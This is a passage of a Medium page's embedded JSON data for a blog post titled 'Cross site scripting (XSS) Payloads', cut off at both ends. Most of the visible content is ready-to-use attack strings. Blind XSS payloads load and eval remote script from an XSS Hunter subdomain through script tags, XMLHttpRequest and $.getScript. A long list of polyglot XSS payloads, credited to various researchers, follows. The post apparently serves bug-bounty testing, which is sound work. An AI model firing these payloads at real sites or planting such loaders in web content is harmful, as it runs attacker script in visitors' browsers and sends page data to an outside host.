2000);\\n}\\n\\u003C\\u002Fscript\\u003E\\n\\u003C\\u002Fhtml\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_53\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_53\",\"name\":\"c0d0\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Blind XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_54\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_54\",\"name\":\"dea0\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS Hunter\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_55\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_55\",\"name\":\"474b\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_56\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_56\",\"name\":\"0d2c\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\\"\\u003E\\u003Cscript src=\\u002F\\u002Fyoursubdomain.xss.ht\\u003E\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_57\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_57\",\"name\":\"03b6\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"javascript:eval('var a=document.createElement(\\\\'script\\\\');a.src=\\\\'https:\\u002F\\u002Fyoursubdomain.xss.ht\\\\';document.body.appendChild(a)')\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_58\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_58\",\"name\":\"7ecb\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003Efunction b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\\\"load\\\", b);a.open(\\\"GET\\\", \\\"\\u002F\\u002Fyoursubdomain.xss.ht\\\");a.send();\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_59\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_59\",\"name\":\"e819\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003E$.getScript(\\\"\\u002F\\u002Fyoursubdomain.xss.ht\\\")\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_60\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_60\",\"name\":\"df9f\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_61\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_61\",\"name\":\"17cb\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — 0xsobky\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":22,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_62\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_62\",\"name\":\"af81\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"jaVasCript:\\u002F*-\\u002F*`\\u002F*\\\\`\\u002F*'\\u002F*\\\"\\u002F**\\u002F(\\u002F* *\\u002FoNcliCk=alert() )\\u002F\\u002F%0D%0A%0D%0A\\u002F\\u002F\\u003C\\u002FstYle\\u002F\\u003C\\u002FtitLe\\u002F\\u003C\\u002FteXtarEa\\u002F\\u003C\\u002FscRipt\\u002F--!\\u003E\\\\x3csVg\\u002F\\u003CsVg\\u002FoNloAd=alert()\\u002F\\u002F\\u003E\\\\x3e\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_63\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_63\",\"name\":\"719c\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Ashar Javed\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":26,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_64\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_64\",\"name\":\"8a6d\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\\"\\u003E\\u003E\\u003Cmarquee\\u003E\\u003Cimg src=x onerror=confirm(1)\\u003E\\u003C\\u002Fmarquee\\u003E\\\" \\u003E\\u003C\\u002Fplaintext\\\\\\u003E\\u003C\\u002F|\\\\\\u003E\\u003Cplaintext\\u002Fonmouseover=prompt(1) \\u003E\\u003Cscript\\u003Eprompt(1)\\u003C\\u002Fscript\\u003E@gmail.com\\u003Cisindex formaction=javascript:alert(\\u002FXSS\\u002F) type=submit\\u003E'--\\u003E\\\" \\u003E\\u003C\\u002Fscript\\u003E\\u003Cscript\\u003Ealert(1)\\u003C\\u002Fscript\\u003E\\\"\\u003E\\u003Cimg\\u002Fid=\\\"confirm\u0026lpar; 1)\\\"\\u002Falt=\\\"\\u002F\\\"src=\\\"\\u002F\\\"onerror=eval(id\u0026%23x29;\\u003E'\\\"\\u003E\\u003Cimg src=\\\"http: \\u002F\\u002Fi.imgur.com\\u002FP8mL8.jpg\\\"\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_65\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_65\",\"name\":\"ddac\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Mathias Karlsson\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":31,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_66\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_66\",\"name\":\"4fa1\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\\" onclick=alert(1)\\u002F\\u002F\\u003Cbutton ‘ onclick=alert(1)\\u002F\\u002F\\u003E *\\u002F alert(1)\\u002F\\u002F\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_67\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_67\",\"name\":\"644e\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Rsnake\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":21,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_68\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_68\",\"name\":\"db6d\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"';alert(String.fromCharCode(88,83,83))\\u002F\\u002F';alert(String. fromCharCode(88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode (88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode(88,83,83))\\u002F\\u002F-- \\u003E\\u003C\\u002FSCRIPT\\u003E\\\"\\u003E'\\u003E\\u003CSCRIPT\\u003Ealert(String.fromCharCode(88,83,83)) \\u003C\\u002FSCRIPT\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_69\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_69\",\"name\":\"7bad\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Daniel Miessler\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":30,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_70\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_70\",\"name\":\"afc0\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"';alert(String.fromCharCode(88,83,83))\\u002F\\u002F';alert(String.fromCharCode(88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode(88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode(88,83,83))\\u002F\\u002F--\\u003E\\u003C\\u002FSCRIPT\\u003E\\\"\\u003E'\\u003E\\u003CSCRIPT\\u003Ealert(String.fromCharCode(88,83,83))\\u003C\\u002FSCRIPT\\u003E\\n“ onclick=alert(1)\\u002F\\u002F\\u003Cbutton ‘ onclick=alert(1)\\u002F\\u002F\\u003E *\\u002F alert(1)\\u002F\\u002F\\n'\\\"\\u003E\\u003E\\u003Cmarquee\\u003E\\u003Cimg src=x onerror=confirm(1)\\u003E\\u003C\\u002Fmarquee\\u003E\\\"\\u003E\\u003C\\u002Fplaintext\\\\\\u003E\\u003C\\u002F|\\\\\\u003E\\u003Cplaintext\\u002Fonmouseover=prompt(1)\\u003E\\u003Cscript\\u003Eprompt(1)\\u003C\\u002Fscript\\u003E@gmail.com\\u003Cisindex formaction=javascript:alert(\\u002FXSS\\u002F) type=submit\\u003E'--\\u003E\\\"\\u003E\\u003C\\u002Fscript\\u003E\\u003Cscript\\u003Ealert(1)\\u003C\\u002Fscript\\u003E\\\"\\u003E\\u003Cimg\\u002Fid=\\\"confirm\u0026lpar;1)\\\"\\u002Falt=\\\"\\u002F\\\"src=\\\"\\u002F\\\"onerror=eval(id\u0026%23x29;\\u003E'\\\"\\u003E\\u003Cimg src=\\\"http:\\u002F\\u002Fi.imgur.com\\u002FP8mL8.jpg\\\"\\u003E\\njavascript:\\u002F\\u002F'\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fscript\\u003E--\\u003E\\u003Cp\\\" onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F--\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\\"\\u002F\\u003C\\u002Ftextarea\\u003E*\\u002F\\u003Calert()\\u002F*' onclick=alert()\\u002F\\u002F\\u003Ea\\njavascript:\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\\"\\u002F\\u003C\\u002Fscript\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u002F--\\u003E*\\u002F\\u003Calert()\\u002F*' onclick=alert()\\u002F\\u002F\\u003E\\u002F\\njavascript:\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E--\\u003E\\u003C\\u002Fscript\\u003E\\u003Ca\\\"\\u002F\\u002F' onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F'\\u002F\\u002F\\\" --\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003Cb onclick= alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fscript --\\u003E\\u003Cli '\\u002F\\u002F\\\" '*\\u002Falert()\\u002F*', onclick=alert()\\u002F\\u002F\\njavascript:alert()\\u002F\\u002F--\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftitle\\u003E\\u003Ca\\\"\\u002F\\u002F' onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\n--\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\\"\\u002F\\u003C\\u002Ftextarea\\u003E\\u003Ca' onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\n\\u002F\\u003C\\u002Ftitle\\u002F'\\u002F\\u003C\\u002Fstyle\\u002F\\u003C\\u002Fscript\\u002F\\u003C\\u002Ftextarea\\u002F--\\u003E\\u003Cp\\\" onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\\njavascript:\\u002F\\u002F--\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fscript\\u003E\\u003Csvg \\\"\\u002F\\u002F' onclick=alert()\\u002F\\u002F\\n\\u002F\\u003C\\u002Ftitle\\u002F'\\u002F\\u003C\\u002Fstyle\\u002F\\u003C\\u002Fscript\\u002F--\\u003E\\u003Cp\\\" onclick=alert()\\u002F\\u002F\\u003E*\\u002Falert()\\u002F*\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_71\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_71\",\"name\":\"54c4\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — from @filedescriptor’s Polyglot Challenge\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"A\",\"start\":20,\"end\":56,\"href\":\"http:\\u002F\\u002Fpolyglot.innerht.ml\",\"anchorType\":\"LINK\",\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":56,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_72\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_72\",\"name\":\"3b0d\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by crlf\\njavascript:\\\"\\u002F*'\\u002F*`\\u002F*--\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftemplate\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Fscript\\u003E\\u003Chtml \\\\\\\" onmouseover=\\u002F*\u0026lt;svg\\u002F*\\u002Fonload=alert()\\u002F\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_73\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_73\",\"name\":\"9f09\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by europa\\njavascript:\\\"\\u002F*'\\u002F*`\\u002F*\\\\\\\" \\u002F*\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Ftemplate\\u003E\\u003C\\u002Fscript\\u002F--\\u003E\u0026lt;svg\\u002Fonload=\\u002F*\\u003Chtml\\u002F*\\u002Fonmouseover=alert()\\u002F\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_74\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_74\",\"name\":\"6a4c\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by EdOverflow\\njavascript:\\\"\\u002F*\\\\\\\"\\u002F*`\\u002F*' \\u002F*\\u003C\\u002Ftemplate\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Ftitle\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fscript\\u003E--\\u003E\u0026lt;svg onload=\\u002F*\\u003Chtml\\u002F*\\u002Fonmouseover=alert()\\u002F\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_75\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_75\",\"name\":\"9ee2\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"# by h1\\u002Fragnar\\njavascript:`\\u002F\\u002F\\\"\\u002F\\u002F\\\\\\\"\\u002F\\u002F\\u003C\\u002Ftitle\\u003E\\u003C\\u002Ftextarea\\u003E\\u003C\\u002Fstyle\\u003E\\u003C\\u002Fnoscript\\u003E\\u003C\\u002Fnoembed\\u003E\\u003C\\u002Fscript\\u003E\\u003C\\u002Ftemplate\\u003E\u0026lt;svg\\u002Fonload='\\u002F*--\\u003E\\u003Chtml *\\u002F onmouseover=alert()\\u002F\\u002F'\\u003E`\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_76\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_76\",\"name\":\"ba14\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Thank you for watching and How did you like this blog ? Tell me in the comment box.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":83,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"EM\",\"start\":0,\"end\":83,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"ImageMetadata:\":{\"__typename\":\"ImageMetadata\",\"id\":\"\",\"alt\":null,\"focusPercentX\":null,\"focusPercentY\":null,\"originalHeight\":null,\"originalWidth\":null},\"PostViewerEdge:postId:6a492d795c0-viewerId:lo_2f5a867f56fa\":{\"__typename\":\"PostViewerEdge\",\"shouldIndexPostForExternalSearch\":true,\"id\":\"postId:6a492d795c0-viewerId:lo_2f5a867f56fa\"},\"Tag:xss-attack\":{\"__typename\":\"Tag\",\"id\":\"xss-attack\",\"displayTitle\":\"Xss Attack\",\"normalizedTagSlug\":\"xss-attack\"},\"Tag:payload\":{\"__typename\":\"Tag\",\"id\":\"payload\",\"displayTitle\":\"Payload\",\"normalizedTagSlug\":\"payload\"},\"Tag:bugsbounty\":{\"__typename\":\"Tag\",\"id\":\"bugsbounty\",\"displayTitle\":\"Bugsbounty\",\"normalizedTagSlug\":\"bugsbounty\"},\"Tag:hackerrank\":{\"__typename\":\"Tag\",\"id\":\"hackerrank\",\"displayTitle\":\"Hackerrank\",\"normalizedTagSlug\":\"hackerrank\"},\"Tag:androx47\":{\"__typename\":\"Tag\",\"id\":\"androx47\",\"displayTitle\":\"Androx47\",\"normalizedTagSlug\":\"androx47\"},\"Post:6a492d795c0\":{\"__typename\":\"Post\",\"id\":\"6a492d795c0\",\"collection\":null,\"content({\\\"postMeteringOptions\\\":{}})\":{\"__typename\":\"PostContent\",\"isLockedPreviewOnly\":false,\"bodyModel\":{\"__typename\":\"RichText\",\"sections\":[{\"__typename\":\"Section\",\"name\":\"0f21\",\"startIndex\":0,\"textLayout\":null,\"imageLayout\":null,\"backgroundImage\":null,\"videoLayout\":null,\"backgroundVideo\":null}],\"paragraphs\":[{\"__ref\":\"Paragraph:3dfccc9ad6b7_0\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_1\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_2\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_3\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_4\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_5\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_6\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_7\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_8\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_9\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_10\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_11\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_12\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_13\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_14\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_15\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_16\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_17\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_18\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_19\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_20\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_21\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_22\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_23\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_24\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_25\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_26\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_27\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_28\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_29\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_30\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_31\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_32\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_33\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_34\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_35\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_36\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_37\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_38\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_39\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_40\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_41\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_42\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_43\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_44\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_45\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_46\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_47\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_48\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_49\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_50\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_51\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_52\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_53\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_54\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_55\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_56\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_57\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_58\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_59\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_60\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_61\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_62\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_63\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_64\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_65\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_66\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_67\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_68\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_69\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_70\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_71\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_72\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_73\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_74\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_75\"},{\"__ref\":\"Paragraph:3dfccc9ad6b7_76\"}]},\"validatedShareKey\":\"\",\"shareKeyCreator\":null},\"creator\":{\"__ref\":\"User:6a7d492724f5\"},\"inResponseToEntityType\":null,\"isLocked\":false,\"isMarkedPaywallOnly\":false,\"lockedSource\":\"LOCKED_POST_SOURCE_NONE\",\"mediumUrl\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002Fcross-site-scripting-xss-payloads-6a492d795c0\",\"primaryTopic\":null,\"topics\":[{\"__typename\":\"Topic\",\"slug\":\"javascript\"},{\"__typename\":\"Topic\",\"slug\":\"programming\"}],\"isPublished\":true,\"latestPublishedVersion\":\"3dfccc9ad6b7\",\"visibility\":\"PUBLIC\",\"postResponses\":{\"__typename\":\"PostResponses\",\"count\":0},\"clapCount\":19,\"allowResponses\":true,\"isLimitedState\":false,\"title\":\"Cross site scripting (XSS) Payloads\",\"isSeries\":false,\"sequence\":null,\"uniqueSlug\":\"cross-site-scripting-xss-payloads-6a492d795c0\",\"socialTitle\":\"\",\"socialDek\":\"\",\"canonicalUrl\":\"\",\"metaDescription\":\"\",\"latestPublishedAt\":1617431235659,\"readingTime\":2.9283018867924526,\"previewContent\":{\"__typename\":\"PreviewContent\",\"subtitle\":\"How does XSS work?\"},\"previewImage\":{\"__ref\":\"ImageMetadata:\"},\"isShortform\":false,\"seoTitle\":\"\",\"firstPublishedAt\":1617431235659,\"updatedAt\":1641530490475,\"shortformType\":\"SHORTFORM_TYPE_LINK\",\"seoDescription\":\"\",\"viewerEdge\":{\"__ref\":\"PostViewerEdge:postId:6a492d795c0-viewerId:lo_2f5a867f56fa\"},\"isSuspended\":false,\"license\":\"ALL_RIGHTS_RESERVED\",\"tags\":[{\"__ref\":\"Tag:xss-attack\"},{\"__ref\":\"Tag:payload\"},{\"__ref\":\"Tag:bugsbounty\"},{\"__ref\":\"Tag:hackerrank\"},{\"__ref\":\"Tag:androx47\"}],\"isNewsletter\":false,\"statusForCollection\":null,\"pendingCollection\":null,\"detectedLanguage\":\"en\",\"wordCount\":776,\"layerCake\":0}}\u003c\/script\u003e\u003cscript\u003ewindow.__MIDDLEWARE_STATE__={\"s